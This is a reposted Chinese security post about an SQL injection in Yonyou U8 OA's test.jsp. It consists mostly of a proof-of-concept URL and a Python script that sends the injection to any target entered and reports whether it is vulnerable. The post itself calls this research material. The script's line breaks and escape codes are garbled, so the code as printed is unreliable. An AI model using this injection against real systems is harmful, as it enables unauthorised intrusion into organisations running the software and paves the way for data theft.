Tips:用友OA产品漏洞
- FOFA -
POC
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
import requestsimport sysimport randomimport refrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+ �33[34mTitle : 用友 U8 OA test.jsp SQL注入漏洞 �33[0m')print('+ �33[36m使用格式: python3 poc.py �33[0m')print('+ �33[36mFile >>> ip.txt �33[0m')print('+------------------------------------------')def POC_1(target_url):vuln_url = target_url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",}try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)if "c4ca4238a0b923820dcc509a6f75849b" in response.text and response.status_code == 200:print("�33[32m[o] 目标 {}存在漏洞 n[o] 响应地址: {} �33[0m".format(target_url, vuln_url))else:print("�33[31m[x] 目标 {}不存在漏洞 �33[0m".format(target_url))except Exception as e:print("�33[31m[x] 目标 {} 请求失败 �33[0m".format(target_url))if __name__ == '__main__':title()target_url = str(input("�33[35mPlease input Attack UrlnUrl >>> �33[0m"))POC_1(target_url)
end
原文始发于微信公众号(安全攻防渗透):知识分享18:用友 U8 OA test.jsp SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论